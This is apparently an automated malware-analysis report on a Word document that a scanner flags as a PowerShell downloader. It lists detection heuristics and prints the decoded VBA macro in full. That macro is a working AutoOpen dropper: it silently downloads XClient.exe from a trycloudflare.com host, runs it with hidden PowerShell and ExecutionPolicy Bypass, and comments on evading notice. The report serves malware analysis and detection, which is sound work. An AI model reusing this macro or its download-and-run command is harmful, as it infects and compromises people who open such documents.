MALICIOUS
Risk Score: 558
Heuristics 15
- ClamAV: Doc.Downloader.Pwshell-10001336-0 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0

- VBA macros detected (medium, 8 related findings, OLE_VBA_MACROS)
  Document contains VBA macro code

- Potential Shell call in VBA (critical, OLE_VBA_SHELL)
  Matched line in script:
  Dim shell As Object

- WScript.Shell usage (critical, OLE_VBA_WSCRIPT)
  Matched line in script:
  Set shell = CreateObject("WScript.Shell")

- PowerShell reference in VBA (critical, OLE_VBA_PS)
  Matched line in script:
  command = "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command ""(New-Object System.Net.WebClient).DownloadFile('" & exeURL & "', '" & tempPath & "'); Start-Process '" & tempPath & "'"""

- VBA stages a PowerShell/LOLBin download-and-run command (critical, OLE_VBA_BITSTRANSFER_DROPPER)
  The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
  Matched line in script:
  Sub AutoOpen()

- CreateObject call (high, OLE_VBA_CREATEOBJ)
  Matched line in script:
  Set shell = CreateObject("WScript.Shell")

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.

- AutoOpen macro (low, OLE_VBA_AUTOOPEN)
  Matched line in script:
  Sub AutoOpen()

- Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
  Matched line in script:
  tempPath = Environ("TEMP") & "\XClient.exe"

- Reference to PowerShell (high, SC_STR_POWERSHELL)

- Reference to Windows Script Host (high, SC_STR_WSCRIPT)

- LOLBin token sequence in document text (high, SE_LOLBIN_RUN_COMMAND)
  Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.

- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

- Embedded URL (info, EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (In document text, OLE body)
  URL: https://developmental-round-owner-cage.trycloudflare.com/XClient.exe (In document text, OLE body)

Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1781 bytes |

SHA-256: b49d10072889c0d1ca60db19f091723dc52982f456d44b11bae669872a933be7

Preview script: first 1,000 lines of the extracted script
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' This macro will run automatically when the document is opened
Sub AutoOpen()
    ' Hides any possible error so as not to alert the user
    On Error Resume Next
    ' --- CONFIGURATION ---
    ' CHANGE THIS LINE to the direct URL of your executable file
    Dim exeURL As String
    exeURL = "https://developmental-round-owner-cage.trycloudflare.com/XClient.exe"
    ' --------------------
    ' Defines a temporary path to save the file, using an inconspicuous name
    Dim tempPath As String
    tempPath = Environ("TEMP") & "\XClient.exe"
    ' Builds the PowerShell command to download and run the file in the background
    ' -WindowStyle Hidden: hides the PowerShell window
    ' -ExecutionPolicy Bypass: ignores the PowerShell script execution policies
    Dim command As String
    command = "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command ""(New-Object System.Net.WebClient).DownloadFile('" & exeURL & "', '" & tempPath & "'); Start-Process '" & tempPath & "'"""
    ' Creates a WScript.Shell object to run the command silently
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    ' Runs the command. The '0' means it runs hidden.
    shell.Run command, 0, False
    ' Cleans up the object so as not to leave traces
    Set shell = Nothing
End Sub

Attribute VB_Name = "NewMacros"
Sub macro()
'
' macro Macro
'
'
End Sub
```